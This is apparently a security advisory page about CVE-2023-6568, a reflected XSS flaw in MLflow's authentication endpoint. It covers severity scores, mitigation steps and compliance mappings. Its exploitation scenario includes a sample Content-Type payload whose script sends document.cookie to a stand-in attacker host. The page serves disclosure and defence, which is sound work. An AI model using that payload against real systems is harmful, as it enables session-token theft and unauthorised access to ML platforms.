AI Threat Alert

CVE-2023-6568: MLflow: reflected XSS via Content-Type header injection

MEDIUM PoC AVAILABLE NUCLEI TEMPLATE
Published December 7, 2023
CISO Take

Patch MLflow immediately if your MLOps team runs it with authentication enabled — an unauthenticated attacker can steal session tokens from data scientists and ML engineers by sending a single crafted link. Successful exploitation grants access to training pipelines, model artifacts, and experiment data, with potential pivot to connected cloud infrastructure. Network-restrict MLflow to internal networks or VPN if patching is delayed.

What is the risk?

CVSS 6.1 understates operational risk in ML environments. The attack requires no authentication and has low complexity — only victim interaction separates an attacker from ML platform access. The Changed scope in the CVSS vector signals cross-boundary impact. Risk is significantly elevated where MLflow is internet-exposed, where ML engineers hold broad data or cloud IAM permissions, or where MLflow credentials are shared/reused across systems.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
MLflow pip No patch
26.6K OpenSSF 5.6 655 dependents Pushed 4d ago 31% patched ~51d to patch Full package profile →

Do you use MLflow? You're affected.

How severe is it?

CVSS 3.1
6.1 / 10
EPSS
1.6%
chance of exploitation in 30 days
Higher than 73% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Nuclei detection template available
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C Low
I Low
A None

What should I do?

5 steps

  1. Patch: Upgrade to a MLflow version including commit 28ff3f94 or later — verify via pip show mlflow and compare against the GitHub advisory.

  2. Network isolation: Restrict MLflow UI and API to internal networks or VPN; remove any public internet exposure immediately.

  3. Detection: Alert on requests to the MLflow auth endpoint with non-standard or anomalously long Content-Type headers.

  4. Credential rotation: Rotate all MLflow service account tokens and user credentials post-patch.

  5. CSP enforcement: Validate that Content-Security-Policy headers are configured on MLflow to reduce XSS impact depth.

How is it classified?

Auth Bypass Data Extraction Framework AML.T0011.003 AML.T0025 AML.T0049 AML.T0106

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.8.4 - Security of AI system development environment
NIST AI RMF
MANAGE 2.4 - Residual risks to AI system operation are mapped and managed
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2023-6568?

Patch MLflow immediately if your MLOps team runs it with authentication enabled — an unauthenticated attacker can steal session tokens from data scientists and ML engineers by sending a single crafted link. Successful exploitation grants access to training pipelines, model artifacts, and experiment data, with potential pivot to connected cloud infrastructure. Network-restrict MLflow to internal networks or VPN if patching is delayed.

Is CVE-2023-6568 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-6568, increasing the risk of exploitation.

How to fix CVE-2023-6568?

1. Patch: Upgrade to a MLflow version including commit 28ff3f94 or later — verify via `pip show mlflow` and compare against the GitHub advisory. 2. Network isolation: Restrict MLflow UI and API to internal networks or VPN; remove any public internet exposure immediately. 3. Detection: Alert on requests to the MLflow auth endpoint with non-standard or anomalously long Content-Type headers. 4. Credential rotation: Rotate all MLflow service account tokens and user credentials post-patch. 5. CSP enforcement: Validate that Content-Security-Policy headers are configured on MLflow to reduce XSS impact depth.

What systems are affected by CVE-2023-6568?

This vulnerability affects the following AI/ML architecture patterns: MLOps platforms, model serving, training pipelines, experiment tracking.

What is the CVSS score for CVE-2023-6568?

CVE-2023-6568 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 1.65%.

What is the AI security impact?

Affected AI Architectures

MLOps platformsmodel servingtraining pipelinesexperiment tracking

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0106 Exploitation for Credential Access

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.8.4
NIST AI RMF: MANAGE 2.4
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

A reflected Cross-Site Scripting (XSS) vulnerability exists in the mlflow/mlflow repository, specifically within the handling of the Content-Type header in POST requests. An attacker can inject malicious JavaScript code into the Content-Type header, which is then improperly reflected back to the user without adequate sanitization or escaping, leading to arbitrary JavaScript execution in the context of the victim's browser. The vulnerability is present in the mlflow/server/auth/__init__.py file, where the user-supplied Content-Type header is directly injected into a Python formatted string and returned to the user, facilitating the XSS attack.

Exploitation Scenario

An attacker targeting an ML team discovers their MLflow instance via Shodan or internal recon. They craft a POST request URL to the MLflow auth endpoint embedding JavaScript in the Content-Type header — e.g., `text/html;<script>fetch('https://attacker.com/?c='+encodeURIComponent(document.cookie))</script>`. The attacker sends a phishing email to a data scientist with a link triggering this request. When the victim clicks, MLflow reflects the malicious Content-Type back unescaped, the script executes in the victim's browser, and their session token is silently exfiltrated. The attacker uses the stolen token to download production model artifacts, inspect training data references, or pivot to connected cloud storage buckets using credentials stored in MLflow's artifact backend configuration.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Primary CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

Timeline

Published
December 7, 2023
Last Modified
November 21, 2024
First Seen
December 7, 2023

Scanner Template Available

A Nuclei vulnerability scanner template exists for this CVE. You can scan your infrastructure for this vulnerability immediately.

View template on GitHub
nuclei -t http/cves/2023/CVE-2023-6568.yaml -u https://target.example.com

Related Vulnerabilities

CRITICAL CVE-2025-15379 10.0

MLflow: RCE via unsanitized model dependency specs

Same package: mlflow
CRITICAL CVE-2023-3765 10.0

MLflow: path traversal allows arbitrary file read

Same package: mlflow
CRITICAL CVE-2026-2635 9.8

mlflow: security flaw enables exploitation

Same package: mlflow
CRITICAL CVE-2023-1177 9.8

MLflow: path traversal allows arbitrary file read/write

Same package: mlflow
CRITICAL CVE-2023-2780 9.8

MLflow: path traversal allows arbitrary file read/write

Same package: mlflow
Back to Threat Feed